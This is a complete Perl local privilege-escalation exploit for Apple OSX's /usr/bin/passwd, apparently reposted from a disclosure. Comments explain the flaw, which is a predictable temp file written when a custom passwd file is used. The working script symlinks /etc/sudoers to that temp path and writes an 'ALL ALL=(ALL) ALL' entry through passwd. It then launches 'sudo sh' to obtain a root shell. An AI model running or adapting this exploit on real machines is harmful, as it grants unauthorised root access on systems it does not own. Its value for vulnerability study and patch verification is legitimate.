Original reference: http://fakehalo.us/xosx-passwd.pl --------------------------------------------------------------------- #!/usr/bin/perl # # /usr/bin/passwd[OSX]: local root exploit. # # by: vade79/v9 v9@xxxxxxxxxxx (fakehalo/realhalo) # # (Apple) OSX's /usr/bin/passwd program has support for a custom # passwd file to be used instead of the standard/static path. this # feature has security issues in the form of editable file(s) being # made anywheres on the disk and also writing arbitrary data to files. # # the first issue will only work if the file does not already exist, # it is done using "umask 0;/usr/bin/passwd -i file -l <filename>". # the second issue is once a successful password change has occured # /usr/bin/passwd will insecurely re-write the passwd file to # /tmp/.pwtmp.<pid>, which can be predicted and linked to a file of # your choice. (this exploits the second issue to overwrite # /etc/sudoers) # # (for some reason this took apple 6 or so months to patch) use POSIX; $fake_passwd="/tmp/xpasswd.$$"; $passwd_pid=($$ + 1); $passwd_tempfile="/tmp/.pwtmp.$passwd_pid"; $sudoers="/etc/sudoers"; sub pexit{print("[!] @_.\n");exit(1);} print("[*] /usr/bin/passwd[OSX]: local root exploit.\n"); print("[*] by: vade79/v9 v9\@fakehalo.us (fakehalo/realhalo)\n\n"); unlink($fake_passwd); print("[*] making fake password file. ($fake_passwd)\n"); open(FP,">$fake_passwd")||pexit("couldn't open/write to $fake_passwd"); # uid must equal the current user. print(FP "ALL ALL=(ALL) ALL #::" . getuid . ":" . getuid . "::" . getuid . ":" . getuid . "::/:/\n"); close(FP); print("[*] sym-linking $sudoers -> $passwd_tempfile.\n"); symlink($sudoers,$passwd_tempfile)||pexit("couldn't link files."); print("[*] running /usr/bin/passwd on $fake_passwd.\n"); print("[*] (use ANY password longer than 4 characters)\n\n"); system("/usr/bin/passwd -i file -l $fake_passwd \"ALL ALL=(ALL) ALL #\""); print("\n[*] running \"sudo sh\", use your REAL (user) password.\n\n"); system("/usr/bin/sudo sh"); exit(0);